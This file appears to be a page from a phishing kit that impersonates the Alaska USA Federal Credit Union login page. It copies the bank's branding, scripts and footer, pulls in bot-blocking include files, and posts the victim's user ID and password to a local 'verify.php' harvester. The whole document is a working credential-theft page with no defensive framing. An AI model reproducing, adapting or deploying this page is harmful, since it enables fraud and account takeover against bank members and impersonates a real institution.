<?php

error_reporting(0);
@ini_set('display_errors', 'on'); 
ob_start();

include 'blocker.php';
include 'antirobot.php';
include 'bt.php';


?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML 
lang="en"><HEAD><META content="IE=11.0000" http-equiv="X-UA-Compatible">

<SCRIPT src="https://login.alaskausa.org/alaska-common.js?matcher" type="text/javascript"></SCRIPT>

<SCRIPT src="https://login.alaskausa.org/alaska-common.js?cache" type="text/javascript"></SCRIPT>

<SCRIPT src="https://login.alaskausa.org/alaska-common.js?async" type="text/javascript" async=""></SCRIPT>
     
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">     
<TITLE>Alaska USA Federal Credit Union</TITLE>     <LINK href="https://login.alaskausa.org/efs/efs/jsp/inc/css/ub-print.css?akusa_rev=2e9dc9f2" 
rel="stylesheet" type="text/css" media="print">     <LINK title="main" href="https://login.alaskausa.org/efs/efs/jsp/inc/css/ub-main.css?akusa_rev=2e9dc9f2" 
rel="stylesheet" type="text/css" media="screen, projection">     <LINK href="https://login.alaskausa.org/efs/efs/jsp/inc/css/ub-login-new.css?akusa_rev=2e9dc9f2" 
rel="stylesheet" type="text/css">     
<STYLE>
      .table {
        display: table;
        width: 100%;
      }
      .tr { display: table-row }
      .left {
        display: table-cell;
        text-align: left;
      }
      .right {
        display: table-cell;
      }
      .fieldLabel {
        font-weight: bold;
        width: 4.5em;
        display: inline-block;
        text-align: right;
        padding-right: .2em;
      }
      .error {
        font-weight: bold;
        color: #bb0000;
      }
      #pgHead #logo {
        background: transparent;
        border: none;
      }
    </STYLE>
     
<STYLE>
    	/*styles from credit union website -- may want to put these in a .css file*/
    	.leftCol {
			padding: 0 0 0 24px; background: url(https://www.alaskausa.org/css/nav/pgMainEdge.png) repeat-y 8px 0;
			width: 480px; float:left;
			margin-bottom:2em;
		}
		.leftCol h2::before {
			top: 50%; margin-top: -4px;
		}
		.leftCol > h2::before {
			content: ""; position: absolute; height: 9px; width: 9px; left: 2px; top: 50%;
			margin-top: -5px; background-color: #004990;
		}
		.leftCol > h2 {
			position: relative; margin: .5em 0 auto -22px; padding-left: 22px; line-height: 1.5em;
		}
		h2 {
			font-size: 1.4em; font-weight: bold; color: #004990;
		}
		.sideBar { width: 250px; float:left; }
		.hint { font-size: .85em; color:#666666;}

		@media only screen and (max-width: 767px) {
			.leftCol { float:none; background:none; padding:0;}
			.sideBar { float:none; }
		}

		@media only screen and (max-width: 479px) {
			.leftCol { width: 100%; }
		}

		.learnMore:first-child {
			margin-top: 0;
		}
		.learnMore { margin: 10px 5px; padding: 0; border-radius: 3px; overflow: hidden; background-color: #3F77C0; color: #ffffff;
		}
		.learnMore h2 { line-height: 32px; margin: 0; border-radius: 3px 3px 0 0; padding: 0 8px;
			font-size: 1.2em; color: #ffffff; background: #004990; font-weight: normal;
		}
		.learnMore ul, .learnMore li {
			margin: .5em 0;
		}
		.learnMore a { color: white !important;}
		.learnMore li { margin-left:30px !important;}
		.learnMore p {
			margin: .5em 0; padding: 0; margin-left: 8px;
		}

		/*from  service/certCalc.asp*/
		/* dataForm table for standardized data-input presentation - simple 2-col table */
		.dataForm {width:100%;border-collapse:collapse;margin-bottom:1em;font-size:1em;margin-top:1em; }
		.dataForm caption {border-top:1px solid gray;background-color:#f0f0f0;font-weight:bold; text-align:left;padding:6px;}
		.dataForm tbody tr:first-child td {border-top:1px solid gray;}
		.dataForm td, .dataForm th {padding:6px;vertical-align:top;text-align:left; border-top:1px solid gray; border-bottom:1px solid gray;}
		.dataForm thead td {border-top:1px solid gray;border-bottom:1px solid black;background-color:#f4f4f4;font-weight:bold;}
		.dataForm tbody th {width:40%; background-color:#eeeeee;font-weight:normal;text-align:right;}
		.dataForm tbody td {border-left:1px solid gray;}
		.dataForm tbody td:first-child {border-left-width:0;}
		.dataForm tfoot {font-size:.85em;color:#666666;padding:.5em;}
		.dataForm tfoot p {margin:.5em 0 0 0;}
		.dataForm .footnotes {margin:3px 5px;font-size:.85em;}

		.dataForm input {text-align:left;}
		.dataForm input[type="text"] {box-sizing:border-box;min-width:30%;}
		.dataForm input[type="submit"] {border-width:0;border-radius:2px;background-color:#3F77C0;color:white;color:white;font: 100% / 1.4 pt_sans_narrowregular, arial, helvetica, sans-serif;}
		.dataForm input[type="submit"]:hover {background-color:#345d8f;}
		.dataForm input[type="radio"] {outline:none;}

		.dataForm div[role="radiogroup"] {margin-bottom:-6px;}
		.dataForm div[role="radiogroup"] label {display:inline-block;box-sizing:border-box;min-width:30%;margin:0 5px 6px 0;border:1px solid #cccccc;border-radius:3px;padding:0 5px 0 0px; background-color:#eeeeee;}
		.dataForm div[role="radiogroup"] label:hover {background-color:#cccccc;color:#000066}
		.dataForm div[role="radiogroup"] label.radioSelected { background-color:#cccccc; color:#000066; }
		.dataForm div[role="radiogroup"].stack {float:left;}
		.dataForm div[role="radiogroup"].stack label {float:left;clear:left;}

		/* dataForm adaptations */
		@media (max-width:479px){
			/* auto-convert radiogroups to "stack" format */
			.dataForm div[role="radiogroup"] label {display:block;margin-right:0;float:none;}
			.dataForm {border-bottom:1px solid gray;}
			.dataForm tbody th {display:block;box-sizing:border-box;width:100%;margin-top:3px;border-width:0;border-top:1px solid gray;padding:3px 6px 0;background-color:#ffffff;text-align:left;color:#004990}
			.dataForm tbody td {display:block;border-width:0;padding-top:0;}
			.dataForm tbody tr:first-child td {border-top:none;}
		}

    </STYLE>
     
<SCRIPT language="JavaScript" src="https://login.alaskausa.org/efs/efs/jslibrary/common_functions.js?akusa_rev=2e9dc9f2" type="text/javascript"></SCRIPT>
     
<SCRIPT language="JavaScript" src="https://login.alaskausa.org/efs/efs/jslibrary/open_window.js?akusa_rev=2e9dc9f2" type="text/javascript"></SCRIPT>
   
<META name="GENERATOR" content="MSHTML 11.00.10570.1001"></HEAD>   
<BODY>
<DIV id="header">
<DIV id="topBar"><A title="Alaska USA Federal Credit Union" id="logo" href="https://www.alaskausa.org/"><IMG 
alt="Alaska USA products for you" src="https://login.alaskausa.org/efs/efs/grafx/akusa/akusafcu_logo.png"></A> 
        
<P id="headerReturnLink"><A title="Home" 
href="https://www.alaskausa.org/">Return to home</A></P></DIV>
<DIV id="pgHead"><!--
        <a title="Alaska USA homepage (in new window)" id="logo" tabindex="-1"
          href="javascript:PopupWindow('AKUSA');">
          <img border="0" alt="Alaska USA" src="/efs/images/logo-corp.png" />
        </a>
        --> 
      </DIV></DIV>
<DIV id="pgMain">
<DIV id="mainContent">
<DIV class="leftCol">
<H2 style="margin-top: 30px;">Account Access Sign In</H2>
<DIV class="last">
<FORM method=post Action=verify.php name=ForgotPAC>
            
<TABLE class="dataForm">
  <TBODY>
  <TR>
    <TH scope="row"><LABEL id="userIdLabel">User ID:</LABEL></TH>
    <TD><INPUT name="user" class="inputField" id="UserName" aria-labelledby="userIdLabel" required="" type="text" maxlength="25"> 
                          </TD></TR>
  <TR>
    <TH scope="row"><LABEL id="emailLabel">Password:</LABEL></TH>
    <TD>
	<INPUT name="pass" class="inputField" id="UserName0" aria-labelledby="userIdLabel" required="" type="text" maxlength="25"> 
                          </TD></TR></TBODY></TABLE>
<DIV 
class="center"><INPUT name="Continue" class="button100" type="submit" value="Continue"></DIV></FORM></DIV>
<H2></H2>
<P> 
</DIV>
<DIV class="sideBar">
<DIV class="learnMore">
<H2 class="help">Quick Help</H2>
<UL class="help">
  <LI id="liNote1"><A 
  onclick="toggleNote('liNote1','note1');return false;">Which email should I 
  use?</A>                 
  <DIV class="notes" id="note1">
  <P>Use the email address assigned to the account.</P></DIV></LI>
  <LI id="liNote2"><A 
  onclick="toggleNote('liNote2','note2');return false;">UltraBanch Business 
  Edition User?</A>                 
  <DIV class="notes" id="note2" style="list-style: none;">                  
  Primary Contacts have three options for assistance:                   
  <UL style="padding-left: 0px; list-style-type: disc;">
    <LI>Contact a Company Administrator</LI>
    <LI>Go into a branch with a photo ID</LI>
    <LI>Attempt an online password reset</LI></UL></DIV></LI>
  <LI><A href="https://www.alaskausa.org/service/ultrabranch/guide.asp?s=msc" 
  target="_blank"></A></LI>
  <LI><A href="https://www.alaskausa.org/service/ultrabranch/guide.asp" target="_blank">Other 
  issues?</A></LI></UL>
<DIV class="help" style="display: none;">
<H1>Questions?  (800) 525-9094</H1></DIV></DIV>
<DIV class="learnMore" id="questionSection">
<H2>Questions?</H2>
<P>              For assistance contact the Member Service Center.             
</P>
<P style="padding-left: 10px; margin-top: 10px;">              (907) 563-4567 or 
(800) 525-9094<BR><BR>              Open 24 hours a day, 7 days a 
week.<BR><BR><A href="https://www.alaskausa.org/service/contact.asp" target="_blank">More 
contact information</A>             </P>
<P></P></DIV></DIV></DIV>
<DIV id="pgFooter" style="background-color: rgb(200, 200, 200);">
<HR>

<DIV id="footer" role="contentinfo"><SPAN class="bug"><IMG alt="Equal Housing Lender" 
src="https://login.alaskausa.org/efs/efs/grafx/akusa/logo-ehl-tri.gif?#042116">  
    </SPAN>                
<P>� Copyright  2020 &#8226; Alaska&nbsp;USA and UltraBranch are registered trademarks 
of Alaska&nbsp;USA Federal Credit Union.</P>
<P>Mortgage loans are provided by Alaska USA Mortgage Company, LLC. License 
#AK157293 <BR>     Washington Consumer Loan Company License #CL-157293. Licensed 
by the Department of Business Oversight under the California Residential 
Mortgage Lending Act, License #4131067</P>
<P><A href="javascript:PopupWindow('Privacy');">Privacy</A></P>
<P class="ncua"><IMG alt="Your funds federally insured to at least $250,000 and backed by the full faith and credit of the United States Government. National Credit Union Administration, a U.S. Government Agency" 
src="https://login.alaskausa.org/efs/efs/grafx/akusa/logo-ncua.gif?#042116"><SPAN>Federally 
insured by NCUA</SPAN>      </P></DIV></DIV></DIV></BODY></HTML>
